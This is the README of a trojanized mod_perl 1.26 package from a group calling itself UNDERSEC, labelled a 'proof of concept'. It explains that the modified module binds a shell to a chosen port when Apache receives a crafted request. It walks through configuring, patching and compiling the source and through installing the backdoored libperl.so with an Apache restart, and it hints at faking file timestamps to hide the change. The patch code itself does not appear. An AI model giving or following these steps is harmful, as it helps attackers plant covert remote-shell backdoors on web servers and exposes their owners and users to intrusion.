*** README file of mod_perl-1.26-DMN trojan v0.90
*** written by Sp4rK <sp4rk@undersec.com>
*** UNDERSEC Security TEAM <http://www.undersec.com>


*** PREFACE

.--------------------------------------------------------------------------.
| This piece of code comes WITH ABSOLUTELY NO WARRANTY                     |
| It's being distributed as a proof of concept. USE IT AT YOUR OWN RISK!!! |
`--------------------------------------------------------------------------'

Sp4rK's (aka my) mod_perl-1.26-DMN trojan makes mod_perl bind a shell to
the first free port of your choice when it catches a special crafted request.

These ports and the request are hardcoded in the source code but chosen at
the configure script i've written.


*** CONFIGURING and INSTALLING

1. Run "./configure", answering all of the questions carefully.

2. Decompress mod_perl-1.26 

# tar zxvf mod_perl-1.26.tar.gz

3. Copy install.modperl and mod_perl-1.26-DMN.diff files to the mod_perl-1.26
   source code directory

# cp install.modperl mod_perl-1.26-DMN.diff /path/to/mod_perl-1.26

4. Change your working directory to the mod_perl-1.26 source code and run
   "./install.modperl"

# cd /path/to/mod_perl-1.26
# ./install.module

5. Enter the configuration, patching and compilation stage and let the
   install.module configure, patch and compile the source code.

6. When compilation success you'll be prompted whether you want the installation
   script to install the new trojanized libperl.so. You must have write
   permissions to the Apache library dir. This script will also try to stop
   and restart Apache in order to make Apache load the new dynamic library.

   If you don't have the right permissions to do so.... why the heck are
   you using it?

   Fuck script kiddies, FUCK'EM ALL!

NOTE: Timestamps are left to you :P


*** GREETINGS

Greets: UNDERSEC Security TEAM, #undersec, #netsearch & my "roni" :P
Shouts: .... (would you like your nick here? Well, I DON'T :P )

